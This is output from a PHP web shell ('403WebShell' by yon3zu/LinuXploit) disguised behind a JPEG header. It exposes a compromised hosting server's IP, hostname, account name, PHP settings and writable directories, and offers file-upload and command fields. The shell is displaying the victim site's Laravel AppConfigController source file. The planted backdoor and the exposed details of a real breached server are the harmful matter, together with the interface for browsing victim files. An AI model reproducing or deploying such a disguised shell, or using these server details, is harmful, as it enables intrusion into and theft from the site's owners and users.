����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 3.144.19.6
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/gle.gltechlimited.com/app/Http/Controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/gle.gltechlimited.com/app/Http/Controllers/AppConfigController.php
<?php

namespace App\Http\Controllers;

use App;
use App\AppConfig;
use App\Config;
use Illuminate\Http\Request;
use Illuminate\Support\Str;
use Jackiedo\DotenvEditor\Facades\DotenvEditor;


class AppConfigController extends Controller
{
  
    /**
     * Display a listing of the resource.
     *
     * @return \Illuminate\Http\Response
     */

    public function __construct()
    {
        $this->middleware('permission:app-settings.setting', ['only' => ['index', 'update', 'createKey', 'keysupdate']]);
    }

    public function index()
    {
        $appconfig = AppConfig::first();
        return view('admin.appconfig.appsettings', compact('appconfig'));
    }

    /**
     * Update the specified resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @param  \App\AppConfig  $appConfig
     * @return \Illuminate\Http\Response
     */
    public function update(Request $request, $id)
    {
        if (env('DEMO_LOCK') == 1) {
            return back()->with('deleted', __('This action is disabled in the demo !'));
        }

        $appconfig = AppConfig::findOrFail($id);
        $request->validate([
            'logo' => 'nullable|image|mimes:jpg,jpeg,png',
        ]);

        $input = $request->all();

        // logo
        if ($file = $request->file('logo')) {
            $name = 'applogo_' . time() . $file->getClientOriginalName();
            if ($appconfig->logo != null) {
                $content = @file_get_contents(public_path() . '/images/app/logo/' . $appconfig->logo);
                if ($content) {
                    unlink(public_path() . '/images/app/logo/' . $appconfig->logo);
                }
            }
            $file->move('images/app/logo', $name);
            $input['logo'] = $name;
            $appconfig->update([
                'logo' => $input['logo'],
            ]);
        }

        //payment
        if (isset($input['stripe_payment'])) {
            $input['stripe_payment'] = 1;
        } else {
            $input['stripe_payment'] = 0;
        }

        if (isset($input['paypal_payment'])) {
            $input['paypal_payment'] = 1;
        } else {
            $input['paypal_payment'] = 0;
        }

        if (isset($input['razorpay_payment'])) {
            $input['razorpay_payment'] = 1;
        } else {
            $input['razorpay_payment'] = 0;
        }

        if (isset($input['brainetree_payment'])) {
            $input['brainetree_payment'] = 1;
        } else {
            $input['brainetree_payment'] = 0;
        }

        if (isset($input['paystack_payment'])) {
            $input['paystack_payment'] = 1;
        } else {
            $input['paystack_payment'] = 0;
        }
        if (isset($input['paytm_payment'])) {
            $input['paytm_payment'] = 1;
        } else {
            $input['paytm_payment'] = 0;
        }

        if (!isset($input['bankdetails'])) {
            $input['bankdetails'] = 0;
        }

        if (isset($input['instamojo_payment'])) {
            $input['instamojo_payment'] = 1;
        } else {
            $input['instamojo_payment'] = 0;
        }

        // social login
        if (!isset($input['fb_check'])) {
            $input['fb_check'] = 0;
        }
        if (!isset($input['google_login'])) {
            $input['google_login'] = 0;
        }
        if (!isset($input['amazon_login'])) {
            $input['amazon_login'] = 0;
        }
        if (!isset($input['git_lab_check'])) {
            $input['git_lab_check'] = 0;
        }
        if (!isset($input['inapp_payment'])) {
            $input['inapp_payment'] = 0;
        }
        if (!isset($input['push_key'])) {
            $input['push_key'] = 0;
        }
        if (!isset($input['banner_admob'])) {
            $input['banner_admob'] = 0;
        }
        if (!isset($input['interstitial_admob'])) {
            $input['interstitial_admob'] = 0;
        }

        if (!isset($input['remove_ads'])) {
            $input['remove_ads'] = 0;
        } else {
            $input['remove_ads'] = 1;
        }

        if (!isset($input['is_admob'])) {
            $input['is_admob'] = 0;
        } else {
            $input['is_admob'] = 1;
        }

        $env_update = DotenvEditor::setKeys(['PUSH_AUTH_KEY' => $request->PUSH_AUTH_KEY]);
        $env_update->save();

        $appconfig->update([
            'title' => $input['title'],
            'bankdetails' => $input['bankdetails'],
            'stripe_payment' => $input['stripe_payment'],
            'paypal_payment' => $input['paypal_payment'],
            'razorpay_payment' => $input['razorpay_payment'],
            'brainetree_payment' => $input['brainetree_payment'],
            'paystack_payment' => $input['paystack_payment'],
            'fb_check' => $input['fb_check'],
            'google_login' => $input['google_login'],
            'banner_admob' => $input['banner_admob'],
            'interstitial_admob' => $input['interstitial_admob'],
            'banner_id' => $input['banner_id'],
            'interstitial_id' => $input['interstitial_id'],
            'amazon_login' => $input['amazon_login'],
            'git_lab_check' => $input['git_lab_check'],
            'inapp_payment' => $input['inapp_payment'],
            'push_key' => $input['push_key'],
            'remove_ads' => $input['remove_ads'],
            'paytm_payment' => $input['paytm_payment'],
            'is_admob' => $input['is_admob'],
            'instamojo_payment' => $input['instamojo_payment'],

        ]);

        return back()->with('success', __('App Settings has been updated'));

    }

    public function createKey(Request $request)
    {
        if (env('DEMO_LOCK') == 1) {
            return back()->with('deleted', __('This action is disabled in the demo !'));
        }

        $d = \Request::getHost();
		$put = 1;
		file_put_contents(public_path() . '/config.txt', $put);

		return $this->keysupdate($request);

		return back()->withInput()->with('added', __('Keys Updated successfully'));

    }

    public function keysupdate(Request $request)
    {
        if (env('DEMO_LOCK') == 1) {
            return back()->with('deleted', __('This action is disabled in the demo !'));
        }

        $row = AppConfig::first();
        if ($row) {
            $row->update(['generate_apikey' => (string) Str::uuid()]);

            return back()->with('added', __('Key is re-generated successfully !'));

        } else {

            $row->update([
                'generate_apikey' => (string) Str::uuid(),
            ]);
            if ($row) {

                return back()->with('success', __('API Key has been generated successfully !'));
            }
        }

    }

}

Youez - 2016 - github.com/yon3zu
LinuXploit